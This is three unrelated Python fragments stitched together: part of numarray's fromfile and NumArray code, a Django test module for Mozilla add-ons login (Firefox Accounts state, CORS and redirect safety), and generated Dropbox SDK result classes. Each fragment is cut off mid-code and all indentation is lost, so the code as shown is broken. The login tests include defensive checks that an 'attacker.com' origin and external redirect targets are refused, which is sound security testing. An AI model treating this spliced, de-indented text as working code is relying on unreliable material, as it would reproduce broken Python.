TYPE.bytes*product(SHAPE) bytes will be read from INFILE, from the
current position. In this case SIZING must be STRICT. If
end-of-file is reached before the required amount of data has been
read, an EarlyEOFError is raised.
Shape incompletely specified
----------------------------
If SHAPE is incompletely specified (contains a -1), data will be
read from INFILE until EOF is reached.
The amount of data used to form the returned array will be a
multiple of `record size', where record size is the product of
TYPE.bytes and the specified elements of SHAPE. If the amount of
data read when end-of-file is reached is not an exact multiple of
the record size, one of the following will occur:
1) if SIZING==STRICT, a SizeMismatchError is raised (default),
2) if SIZING==SLOPPY, the extra data will be silently disregarded,
3) if SIZING==WARN, a SizeMismatchWarning is issued.
In cases (2) and (3), if there is extra data, an attempt is made
to position the file cursor to just after the last byte actually
used; this will only succeed if the file has a seek() method. If
the seek() fails, a FileSeekWarning is issued, but no error is
raised.
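Example (illustrative sketch, added for clarity; assumes "samples.bin" holds
raw Int16 data):
a = fromfile("samples.bin", type=Int16, shape=(-1, 2))   # read all frames, 2 per row
b = fromfile(open("samples.bin", "rb"), type=Int16, shape=100)  # exactly 100 values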
"""
type = _nt._typeFromKeywords(type, typecode, dtype)
if isinstance(infile,(str,unicode)):
infile=open(infile,"rb")
if type is None:
type=_nt.Int32
type = _nt.getType(type) # allow for typenames and Numeric charcodes
if shape is None:
shape=(-1,)
if(list(shape).count(-1)>1):
raise ValueError("At most one unspecified dimension in shape")
if -1 not in shape:
if not sizing == STRICT:
raise ValueError("sizing must be STRICT if size complete")
arr=NumArray(type=type,shape=shape)
bytesleft=type.bytes*_gen.product(shape)
bytesread=0
while bytesleft > _BLOCKSIZE:
data=infile.read(_BLOCKSIZE)
if len(data) != _BLOCKSIZE:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr._data[bytesread:bytesread+_BLOCKSIZE]=data
bytesread += _BLOCKSIZE
bytesleft -= _BLOCKSIZE
if bytesleft > 0:
data = infile.read(bytesleft)
if len(data) != bytesleft:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr._data[bytesread:bytesread+bytesleft]=data
return arr
##shape is incompletely specified
##read until EOF
##implementation 1: naively use memory blocks
##problematic because memory allocation can be double what is
##necessary (!)
##the most common case, namely reading in data from an unchanging
##file whose size may be determined before allocation, should be
##quick -- only one allocation will be needed.
recsize = type.bytes * _gen.product([i for i in shape if i != -1])
blocksize = max(_BLOCKSIZE/recsize, 1)*recsize
##try to estimate file size
try:
curpos=infile.tell()
infile.seek(0,2)
endpos=infile.tell()
infile.seek(curpos)
except (AttributeError, IOError):
initsize=blocksize
else:
initsize=max(1,(endpos-curpos)/recsize)*recsize
buf = memory.new_memory(initsize)
bytesread=0
while 1:
data=infile.read(blocksize)
if len(data) != blocksize: ##eof
break
##do we have space?
if len(buf) < bytesread+blocksize:
buf=_resizebuf(buf,len(buf)+blocksize)
## or rather a=resizebuf(a,2*len(a)) ?
assert len(buf) >= bytesread+blocksize
buf[bytesread:bytesread+blocksize]=data
bytesread += blocksize
if len(data) % recsize != 0:
if sizing == STRICT:
raise SizeMismatchError("Filesize does not match specified shape")
if sizing == WARN:
_warnings.warn("Filesize does not match specified shape",
SizeMismatchWarning)
try:
infile.seek(-(len(data) % recsize),1)
except AttributeError:
_warnings.warn("Could not rewind (no seek support)",
FileSeekWarning)
except IOError:
_warnings.warn("Could not rewind (IOError in seek)",
FileSeekWarning)
datasize = (len(data)/recsize) * recsize
if len(buf) != bytesread+datasize:
buf=_resizebuf(buf,bytesread+datasize)
buf[bytesread:bytesread+datasize]=data[:datasize]
##deduce shape from len(buf)
shape = list(shape)
uidx = shape.index(-1)
shape[uidx]=len(buf) / recsize
a = NumArray(buffer=buf,shape=shape,type=type)
if a._type is _nt.Bool:
ufunc.not_equal(a, 0, a)
return a
def _resizebuf(buf,newsize):
"Return a copy of BUF of size NEWSIZE."
newbuf=memory.new_memory(newsize)
if newsize > len(buf):
newbuf[:len(buf)]=buf
else:
newbuf[:]=buf[:len(newbuf)]
return newbuf
class UsesOpPriority(object):
"""Classes can subclass from UsesOpPriority to signal to numarray
that perhaps the class' r-operator hook (e.g. __radd__) should be
given preference over NumArray's l-operator hook (e.g. __add__).
This would be done so that when different object types are used in
an operation (e.g. NumArray + MaskedArray) the type of the result
is well defined and independent of the order of the operands
(e.g. MaskedArray).
Before altering the "normal" behavior of an operator, this scheme
(implemented in the operator hook functions of NumArray) first
checks to see if the other operand subclasses UsesOpPriority. If
it does, the op priorities of both operands are compared, and an
appropriate hook function from the one with the highest priority
is called.
Thus, a subclass of NumArray which wants to ensure that its type
dominates in mixed type operations should define a class level
op_priority > 0. If several subclasses wind up doing this,
op_priority will determine how they relate to one another as well.
"""
op_priority = 0.0
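# Illustrative sketch (added for clarity, not part of numarray): a subclass that
# wants its reflected operators to win in mixed expressions raises op_priority.
#
#     class MaskedLike(NumArray):        # NumArray itself subclasses UsesOpPriority
#         op_priority = 1.0
#         def __radd__(self, other):
#             ...                        # build and return a MaskedLike result
#
# With this, `plain + masked` (plain: NumArray, masked: MaskedLike) dispatches to
# MaskedLike.__radd__ because 1.0 > NumArray's default op_priority of 0.0.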
class NumArray(_numarray._numarray, _gen.NDArray, UsesOpPriority):
"""Fundamental numerical array class.
NumArray(shape=None, type=None, buffer=None, byteoffset=0, bytestride=None,
byteorder=sys.byteorder, aligned=1, real=None, imag=None)
shape The shape of the resulting array.
type The type of each data element, e.g. Int32.
buffer An object which supports the Python buffer protocol in C.
byteoffset Offset in bytes from the start of 'buffer' to the array data.
bytestride Distance in bytes between single elements.
byteorder The actual ordering of bytes in buffer: "big" or "little".
aligned Flag declaring whether array data is aligned or not (legacy).
real Initializer for real component of complex arrays.
imag Initializer for imaginary component of complex arrays.
"""
if _PROTOTYPE:
def __init__(self, shape=None, type=None, buffer=None,
byteoffset=0, bytestride=None, byteorder=_sys.byteorder,
aligned=1, real=None, imag=None):
type = _nt.getType(type)
itemsize = type.bytes
_gen.NDArray.__init__(self, shape, itemsize, buffer,
byteoffset, bytestride)
self._type = type
if byteorder in ["little", "big"]:
self._byteorder = byteorder
else:
raise ValueError("byteorder must be 'little' or 'big'")
if real is not None:
self.real = real
if imag is not None:
self.imag = imag
def _copyFrom(self, arr):
"""Copy elements from another | |
# -*- coding: utf-8 -*-
import base64
import urlparse
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.contrib.messages import get_messages
from django.core.urlresolvers import resolve, reverse
from django.test import RequestFactory
from django.test.utils import override_settings
import mock
from waffle.models import Switch
from rest_framework.test import APIRequestFactory, APITestCase
from rest_framework_jwt.serializers import VerifyJSONWebTokenSerializer
from olympia.access.acl import action_allowed_user
from olympia.access.models import Group, GroupUser
from olympia.accounts import verify, views
from olympia.amo.helpers import absolutify, urlparams
from olympia.amo.tests import (
assert_url_equal, create_switch, user_factory, APITestClient,
InitializeSessionMixin, PatchMixin, TestCase, WithDynamicEndpoints)
from olympia.api.tests.utils import APIKeyAuthTestCase
from olympia.users.models import UserProfile
FXA_CONFIG = {
'oauth_host': 'https://accounts.firefox.com/v1',
'client_id': 'amodefault',
'redirect_url': 'https://addons.mozilla.org/fxa-authenticate',
'scope': 'profile',
}
@override_settings(FXA_CONFIG={'default': FXA_CONFIG, 'internal': FXA_CONFIG})
class BaseAuthenticationView(APITestCase, PatchMixin,
InitializeSessionMixin):
def setUp(self):
self.url = reverse(self.view_name)
self.fxa_identify = self.patch(
'olympia.accounts.views.verify.fxa_identify')
class TestFxALoginWaffle(APITestCase):
def setUp(self):
self.login_url = reverse('accounts.login')
self.register_url = reverse('accounts.register')
self.source_url = reverse('accounts.source')
def test_login_422_when_waffle_is_on(self):
response = self.client.post(self.login_url)
assert response.status_code == 422
def test_register_422_when_waffle_is_on(self):
response = self.client.post(self.register_url)
assert response.status_code == 422
def test_source_200_when_waffle_is_on(self):
response = self.client.get(self.source_url, {'email': '<EMAIL>'})
assert response.status_code == 200
@override_settings(FXA_CONFIG={'current-config': FXA_CONFIG})
class TestLoginStartBaseView(WithDynamicEndpoints, TestCase):
class LoginStartView(views.LoginStartBaseView):
DEFAULT_FXA_CONFIG_NAME = 'current-config'
def setUp(self):
super(TestLoginStartBaseView, self).setUp()
self.endpoint(self.LoginStartView, r'^login/start/')
self.url = '/en-US/firefox/login/start/'
self.initialize_session({})
def test_state_is_set(self):
self.initialize_session({})
assert 'fxa_state' not in self.client.session
state = 'somerandomstate'
with mock.patch('olympia.accounts.views.generate_fxa_state',
lambda: state):
self.client.get(self.url)
assert 'fxa_state' in self.client.session
assert self.client.session['fxa_state'] == state
def test_redirect_url_is_correct(self):
self.initialize_session({})
with mock.patch('olympia.accounts.views.generate_fxa_state',
lambda: 'arandomstring'):
response = self.client.get(self.url)
assert response.status_code == 302
url = urlparse.urlparse(response['location'])
redirect = '{scheme}://{netloc}{path}'.format(
scheme=url.scheme, netloc=url.netloc, path=url.path)
assert redirect == 'https://accounts.firefox.com/v1/authorization'
assert urlparse.parse_qs(url.query) == {
'action': ['signin'],
'client_id': ['amodefault'],
'redirect_url': ['https://addons.mozilla.org/fxa-authenticate'],
'scope': ['profile'],
'state': ['arandomstring'],
}
def test_state_is_not_overriden(self):
self.initialize_session({'fxa_state': 'thisisthestate'})
self.client.get(self.url)
assert self.client.session['fxa_state'] == 'thisisthestate'
def test_to_is_included_in_redirect_state(self):
path = '/addons/unlisted-addon/'
# The =s will be stripped from the URL.
assert '=' in base64.urlsafe_b64encode(path)
state = 'somenewstatestring'
self.initialize_session({})
with mock.patch('olympia.accounts.views.generate_fxa_state',
lambda: state):
response = self.client.get(self.url, data={'to': path})
assert self.client.session['fxa_state'] == state
url = urlparse.urlparse(response['location'])
query = urlparse.parse_qs(url.query)
state_parts = query['state'][0].split(':')
assert len(state_parts) == 2
assert state_parts[0] == state
assert '=' not in state_parts[1]
assert base64.urlsafe_b64decode(state_parts[1] + '====') == path
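# Illustrative sketch of the round trip exercised above:
#
#     encoded = base64.urlsafe_b64encode('/addons/unlisted-addon/').rstrip('=')
#     # the stripped value travels as the part after ':' in `state`; on the way back,
#     base64.urlsafe_b64decode(encoded + '====')   # surplus '=' padding is tolerated
#     # which restores '/addons/unlisted-addon/'.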
def test_to_is_excluded_when_unsafe(self):
path = 'https://www.google.com'
self.initialize_session({})
response = self.client.get(
'{url}?to={path}'.format(path=path, url=self.url))
url = urlparse.urlparse(response['location'])
query = urlparse.parse_qs(url.query)
assert ':' not in query['state'][0]
def has_cors_headers(response, origin='https://addons-frontend'):
return (
response['Access-Control-Allow-Origin'] == origin and
response['Access-Control-Allow-Credentials'] == 'true')
def update_domains(overrides):
overrides = overrides.copy()
overrides['CORS_ORIGIN_WHITELIST'] = ['addons-frontend', 'localhost:3000']
return overrides
endpoint_overrides = [
(regex, update_domains(overrides))
for regex, overrides in settings.CORS_ENDPOINT_OVERRIDES]
@override_settings(
FXA_CONFIG={'default': FXA_CONFIG},
CORS_ENDPOINT_OVERRIDES=endpoint_overrides)
class TestLoginView(BaseAuthenticationView):
client_class = APITestClient
view_name = 'accounts.login'
def setUp(self):
super(TestLoginView, self).setUp()
self.client.defaults['HTTP_ORIGIN'] = 'https://addons-frontend'
self.state = 'stateaosidoiajsdaagdsasi'
self.initialize_session({'fxa_state': self.state})
self.code = 'codeaosidjoiajsdioasjdoa'
self.update_user = self.patch(
'olympia.accounts.views.update_user')
def options(self, url, origin):
return self.client_class(HTTP_ORIGIN=origin).options(url)
def test_correct_config_is_used(self):
assert views.LoginView.DEFAULT_FXA_CONFIG_NAME == 'default'
assert views.LoginView.ALLOWED_FXA_CONFIGS == (
['default', 'amo', 'local'])
def test_cors_addons_frontend(self):
response = self.options(self.url, origin='https://addons-frontend')
assert has_cors_headers(response, origin='https://addons-frontend')
assert response.status_code == 200
def test_cors_localhost(self):
response = self.options(self.url, origin='http://localhost:3000')
assert has_cors_headers(response, origin='http://localhost:3000')
assert response.status_code == 200
def test_cors_other(self):
response = self.options(self.url, origin='https://attacker.com')
assert 'Access-Control-Allow-Origin' not in response
assert 'Access-Control-Allow-Methods' not in response
assert 'Access-Control-Allow-Headers' not in response
assert 'Access-Control-Allow-Credentials' not in response
assert response.status_code == 200
class TestLoginStartView(TestCase):
def test_default_config_is_used(self):
assert views.LoginStartView.DEFAULT_FXA_CONFIG_NAME == 'default'
assert views.LoginStartView.ALLOWED_FXA_CONFIGS == (
['default', 'amo', 'local'])
class TestLoginUser(TestCase):
def setUp(self):
self.request = APIRequestFactory().get('/login')
self.enable_messages(self.request)
self.user = UserProfile.objects.create(
email='<EMAIL>', fxa_id='9001')
self.identity = {'email': '<EMAIL>', 'uid': '9001'}
patcher = mock.patch('olympia.accounts.views.login')
self.login = patcher.start()
self.addCleanup(patcher.stop)
patcher = mock.patch('olympia.users.models.commonware.log')
commonware_log = patcher.start()
commonware_log.get_remote_addr.return_value = '8.8.8.8'
self.addCleanup(patcher.stop)
def test_user_gets_logged_in(self):
assert len(get_messages(self.request)) == 0
views.login_user(self.request, self.user, self.identity)
self.login.assert_called_with(self.request, self.user)
assert len(get_messages(self.request)) == 0
def test_login_attempt_is_logged(self):
now = datetime.now()
self.user.update(last_login_attempt=now)
views.login_user(self.request, self.user, self.identity)
self.login.assert_called_with(self.request, self.user)
assert self.user.last_login_attempt > now
assert self.user.last_login_ip == '8.8.8.8'
def test_fxa_data_gets_set_migrating(self):
assert len(get_messages(self.request)) == 0
self.user.update(fxa_id=None)
views.login_user(self.request, self.user, self.identity)
user = self.user.reload()
assert user.fxa_id == '9001'
assert not user.has_usable_password()
assert len(get_messages(self.request)) == 1
def test_fxa_data_gets_set_migration_over(self):
assert len(get_messages(self.request)) == 0
self.user.update(fxa_id=None)
self.create_switch('fxa-migrated', active=True)
views.login_user(self.request, self.user, self.identity)
user = self.user.reload()
assert user.fxa_id == '9001'
assert not user.has_usable_password()
assert len(get_messages(self.request)) == 0
def test_email_address_can_change(self):
assert len(get_messages(self.request)) == 0
self.user.update(email='<EMAIL>')
views.login_user(self.request, self.user, self.identity)
user = self.user.reload()
assert user.fxa_id == '9001'
assert user.email == '<EMAIL>'
assert len(get_messages(self.request)) == 0
class TestFindUser(TestCase):
def test_user_exists_with_uid(self):
user = UserProfile.objects.create(fxa_id='9999', email='<EMAIL>')
found_user = views.find_user({'uid': '9999', 'email': '<EMAIL>'})
assert user == found_user
def test_user_exists_with_email(self):
user = UserProfile.objects.create(fxa_id='9999', email='<EMAIL>')
found_user = views.find_user({'uid': '8888', 'email': '<EMAIL>'})
assert user == found_user
def test_user_exists_with_both(self):
user = UserProfile.objects.create(fxa_id='9999', email='<EMAIL>')
found_user = views.find_user({'uid': '9999', 'email': '<EMAIL>'})
assert user == found_user
def test_two_users_exist(self):
UserProfile.objects.create(
fxa_id='9999', email='<EMAIL>', username='me')
UserProfile.objects.create(
fxa_id='8888', email='<EMAIL>', username='you')
with self.assertRaises(UserProfile.MultipleObjectsReturned):
views.find_user({'uid': '9999', 'email': '<EMAIL>'})
class TestRenderErrorHTML(TestCase):
def make_request(self):
request = APIRequestFactory().get(reverse('accounts.authenticate'))
request.user = AnonymousUser()
return self.enable_messages(request)
def login_url(self, **params):
return urlparams(reverse('users.login'), **params)
def migrate_url(self, **params):
return absolutify(urlparams(reverse('users.migrate'), **params))
def render_error(self, request, error, next_path=None):
return views.render_error(
request, error, format='html', next_path=next_path)
def test_error_no_code_with_safe_path(self):
request = self.make_request()
assert len(get_messages(request)) == 0
response = self.render_error(
request, views.ERROR_NO_CODE, next_path='/over/here')
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert 'could not be parsed' in next(iter(messages)).message
assert_url_equal(response['location'], self.login_url(to='/over/here'))
def test_error_no_profile_with_no_path(self):
request = self.make_request()
assert len(get_messages(request)) == 0
response = self.render_error(request, views.ERROR_NO_PROFILE)
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert ('Firefox Account could not be found'
in next(iter(messages)).message)
assert_url_equal(response['location'], self.login_url())
def test_error_state_mismatch_with_unsafe_path(self):
request = self.make_request()
assert len(get_messages(request)) == 0
response = self.render_error(
request, views.ERROR_STATE_MISMATCH,
next_path='https://www.google.com/')
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert 'could not be logged in' in next(iter(messages)).message
assert_url_equal(response['location'], self.login_url())
def test_error_no_code_with_safe_path_logged_in(self):
request = self.make_request()
request.user = UserProfile()
assert len(get_messages(request)) == 0
response = self.render_error(
request, views.ERROR_NO_CODE, next_path='/over/here')
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert 'could not be parsed' in next(iter(messages)).message
assert_url_equal(
response['location'],
self.migrate_url(to='/over/here'))
class TestRenderErrorJSON(TestCase):
def setUp(self):
patcher = mock.patch('olympia.accounts.views.Response')
self.Response = patcher.start()
self.addCleanup(patcher.stop)
def make_request(self):
return APIRequestFactory().post(reverse('accounts.login'))
def render_error(self, error):
views.render_error(self.make_request(), error, format='json')
def test_unknown_error(self):
self.render_error('not-an-error')
self.Response.assert_called_with({'error': 'not-an-error'}, status=422)
def test_error_no_profile(self):
self.render_error(views.ERROR_NO_PROFILE)
self.Response.assert_called_with(
{'error': views.ERROR_NO_PROFILE}, status=401)
def test_error_state_mismatch(self):
self.render_error(views.ERROR_STATE_MISMATCH)
self.Response.assert_called_with(
{'error': views.ERROR_STATE_MISMATCH}, status=400)
class TestWithUser(TestCase):
def setUp(self):
self.fxa_identify = self.patch(
'olympia.accounts.views.verify.fxa_identify')
self.find_user = self.patch('olympia.accounts.views.find_user')
self.render_error = self.patch('olympia.accounts.views.render_error')
self.request = mock.MagicMock()
self.user = UserProfile()
self.request.user = self.user
self.request.session = {'fxa_state': 'some-blob'}
@views.with_user(format='json')
def fn(*args, **kwargs):
return args, kwargs
def test_profile_exists_with_user(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {'code': 'foo', 'state': 'some-blob'}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_with_user_and_path(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
# "/a/path/?" gets URL safe base64 encoded to L2EvcGF0aC8_.
self.request.data = {
'code': 'foo',
'state': u'some-blob:{next_path}'.format(
next_path=base64.urlsafe_b64encode('/a/path/?')),
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': '/a/path/?',
}
def test_profile_exists_with_user_and_path_stripped_padding(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
# "/foo" gets URL safe base64 encoded to L2Zvbw== so it will be L2Zvbw.
self.request.data = {
'code': 'foo',
'state': u'some-blob:{next_path}'.format(next_path='L2Zvbw'),
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': '/foo',
}
def test_profile_exists_with_user_and_path_bad_encoding(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {
'code': 'foo',
'state': u'some-blob:/raw/path',
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_with_user_and_empty_path(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {
'code': 'foo',
'state': u'some-blob:',
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_with_user_and_path_is_not_safe(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {
'code': 'foo',
'state': u'some-blob:{next_path}'.format(
next_path=base64.urlsafe_b64encode('https://www.google.com')),
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_no_user(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = None
self.request.data = {'code': 'foo', 'state': 'some-blob'}
self.user.is_authenticated = lambda: False
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': None,
'identity': identity,
'next_path': None,
}
def test_profile_does_not_exist(self):
self.fxa_identify.side_effect = verify.IdentificationError
self.request.data = {'code': 'foo', 'state': 'some-blob'}
self.fn(self.request)
| |
= val
self._metadata_present = True
@metadata.deleter
def metadata(self):
self._metadata_value = None
self._metadata_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchResultData, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchResultData(metadata={!r})'.format(
self._metadata_value,
)
RelocationBatchResultData_validator = bv.Struct(RelocationBatchResultData)
class RelocationBatchResultEntry(bb.Union):
"""
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
"""
_catch_all = 'other'
# Attribute is overwritten below the class definition
other = None
@classmethod
def success(cls, val):
"""
Create an instance of this class set to the ``success`` tag with value
``val``.
:param Metadata val:
:rtype: RelocationBatchResultEntry
"""
return cls('success', val)
@classmethod
def failure(cls, val):
"""
Create an instance of this class set to the ``failure`` tag with value
``val``.
:param RelocationBatchErrorEntry val:
:rtype: RelocationBatchResultEntry
"""
return cls('failure', val)
def is_success(self):
"""
Check if the union tag is ``success``.
:rtype: bool
"""
return self._tag == 'success'
def is_failure(self):
"""
Check if the union tag is ``failure``.
:rtype: bool
"""
return self._tag == 'failure'
def is_other(self):
"""
Check if the union tag is ``other``.
:rtype: bool
"""
return self._tag == 'other'
def get_success(self):
"""
Only call this if :meth:`is_success` is true.
:rtype: Metadata
"""
if not self.is_success():
raise AttributeError("tag 'success' not set")
return self._value
def get_failure(self):
"""
Only call this if :meth:`is_failure` is true.
:rtype: RelocationBatchErrorEntry
"""
if not self.is_failure():
raise AttributeError("tag 'failure' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchResultEntry, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchResultEntry(%r, %r)' % (self._tag, self._value)
RelocationBatchResultEntry_validator = bv.Union(RelocationBatchResultEntry)
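# Illustrative usage sketch (added for clarity, not part of the generated module):
# consuming one tagged-union entry per relocated item.
#
#     for entry in result.entries:            # result: a RelocationBatchV2Result
#         if entry.is_success():
#             metadata = entry.get_success()  # Metadata of the relocated item
#         elif entry.is_failure():
#             error = entry.get_failure()     # RelocationBatchErrorEntry
#         else:
#             pass                            # is_other(): tag added after this SDK release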
class RelocationBatchV2JobStatus(async_.PollResultBase):
"""
Result returned by :meth:`dropbox.dropbox.Dropbox.files_copy_batch_check` or
:meth:`dropbox.dropbox.Dropbox.files_move_batch_check` that may either be in
progress or completed with result for each entry.
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
:ivar RelocationBatchV2Result RelocationBatchV2JobStatus.complete: The copy
or move batch job has finished.
"""
@classmethod
def complete(cls, val):
"""
Create an instance of this class set to the ``complete`` tag with value
``val``.
:param RelocationBatchV2Result val:
:rtype: RelocationBatchV2JobStatus
"""
return cls('complete', val)
def is_complete(self):
"""
Check if the union tag is ``complete``.
:rtype: bool
"""
return self._tag == 'complete'
def get_complete(self):
"""
The copy or move batch job has finished.
Only call this if :meth:`is_complete` is true.
:rtype: RelocationBatchV2Result
"""
if not self.is_complete():
raise AttributeError("tag 'complete' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchV2JobStatus, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchV2JobStatus(%r, %r)' % (self._tag, self._value)
RelocationBatchV2JobStatus_validator = bv.Union(RelocationBatchV2JobStatus)
class RelocationBatchV2Launch(async_.LaunchResultBase):
"""
Result returned by :meth:`dropbox.dropbox.Dropbox.files_copy_batch` or
:meth:`dropbox.dropbox.Dropbox.files_move_batch` that may either launch an
asynchronous job or complete synchronously.
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
"""
@classmethod
def complete(cls, val):
"""
Create an instance of this class set to the ``complete`` tag with value
``val``.
:param RelocationBatchV2Result val:
:rtype: RelocationBatchV2Launch
"""
return cls('complete', val)
def is_complete(self):
"""
Check if the union tag is ``complete``.
:rtype: bool
"""
return self._tag == 'complete'
def get_complete(self):
"""
Only call this if :meth:`is_complete` is true.
:rtype: RelocationBatchV2Result
"""
if not self.is_complete():
raise AttributeError("tag 'complete' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchV2Launch, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchV2Launch(%r, %r)' % (self._tag, self._value)
RelocationBatchV2Launch_validator = bv.Union(RelocationBatchV2Launch)
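# Illustrative sketch (assumes an authenticated client `dbx` and a prepared list
# `entries`; method names follow the docstrings above):
#
#     launch = dbx.files_copy_batch(entries)                # RelocationBatchV2Launch
#     if launch.is_complete():
#         result = launch.get_complete()
#     elif launch.is_async_job_id():
#         status = dbx.files_copy_batch_check(launch.get_async_job_id())
#         if status.is_complete():                          # RelocationBatchV2JobStatus
#             result = status.get_complete()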
class RelocationBatchV2Result(FileOpsResult):
"""
:ivar files.RelocationBatchV2Result.entries: Each entry in
``CopyBatchArg.entries`` or ``MoveBatchArg.entries`` will appear at the same
position inside ``RelocationBatchV2Result.entries``.
"""
__slots__ = [
'_entries_value',
'_entries_present',
]
_has_required_fields = True
def __init__(self,
entries=None):
super(RelocationBatchV2Result, self).__init__()
self._entries_value = None
self._entries_present = False
if entries is not None:
self.entries = entries
@property
def entries(self):
"""
Each entry in ``CopyBatchArg.entries`` or ``MoveBatchArg.entries`` will
appear at the same position inside ``RelocationBatchV2Result.entries``.
:rtype: list of [RelocationBatchResultEntry]
"""
if self._entries_present:
return self._entries_value
else:
raise AttributeError("missing required field 'entries'")
@entries.setter
def entries(self, val):
val = self._entries_validator.validate(val)
self._entries_value = val
self._entries_present = True
@entries.deleter
def entries(self):
self._entries_value = None
self._entries_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchV2Result, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchV2Result(entries={!r})'.format(
self._entries_value,
)
RelocationBatchV2Result_validator = bv.Struct(RelocationBatchV2Result)
class RelocationResult(FileOpsResult):
"""
:ivar files.RelocationResult.metadata: Metadata of the relocated object.
"""
__slots__ = [
'_metadata_value',
'_metadata_present',
]
_has_required_fields = True
def __init__(self,
metadata=None):
super(RelocationResult, self).__init__()
self._metadata_value = None
self._metadata_present = False
if metadata is not None:
self.metadata = metadata
@property
def metadata(self):
"""
Metadata of the relocated object.
:rtype: Metadata
"""
if self._metadata_present:
return self._metadata_value
else:
raise AttributeError("missing required field 'metadata'")
@metadata.setter
def metadata(self, val):
self._metadata_validator.validate_type_only(val)
self._metadata_value = val
self._metadata_present = True
@metadata.deleter
def metadata(self):
self._metadata_value = None
self._metadata_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationResult, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationResult(metadata={!r})'.format(
self._metadata_value,
)
RelocationResult_validator = bv.Struct(RelocationResult)
class RestoreArg(bb.Struct):
"""
:ivar files.RestoreArg.path: The path to save the restored file.
:ivar files.RestoreArg.rev: The revision to restore.
"""
__slots__ = [
'_path_value',
'_path_present',
'_rev_value',
'_rev_present',
]
_has_required_fields = True
def __init__(self,
path=None,
rev=None):
self._path_value = None
self._path_present = False
self._rev_value = None
self._rev_present = False
if path is not None:
self.path = path
if rev is not None:
self.rev = rev
@property
def path(self):
"""
The path to save the restored file.
:rtype: str
"""
if self._path_present:
return self._path_value
else:
raise AttributeError("missing required field 'path'")
@path.setter
def path(self, val):
val = self._path_validator.validate(val)
self._path_value = val
self._path_present = True
@path.deleter
def path(self):
self._path_value = None
self._path_present = False
@property
def rev(self):
"""
The revision to restore.
:rtype: str
"""
if self._rev_present:
return self._rev_value
else:
raise AttributeError("missing required field 'rev'")
@rev.setter
def rev(self, val):
val = self._rev_validator.validate(val)
self._rev_value = val
self._rev_present = True
@rev.deleter
def rev(self):
self._rev_value = None
self._rev_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RestoreArg, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RestoreArg(path={!r}, rev={!r})'.format(
self._path_value,
self._rev_value,
)
RestoreArg_validator = bv.Struct(RestoreArg)
class RestoreError(bb.Union):
"""
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
:ivar LookupError RestoreError.path_lookup: An error occurs when downloading
metadata for the file.
:ivar WriteError RestoreError.path_write: An error occurs when trying to
restore the file to that path.
:ivar files.RestoreError.invalid_revision: The revision is invalid. It may
not exist.
"""
_catch_all = 'other'
# Attribute is overwritten below the class definition
invalid_revision = None
# Attribute is overwritten below the class definition
other = None
@classmethod
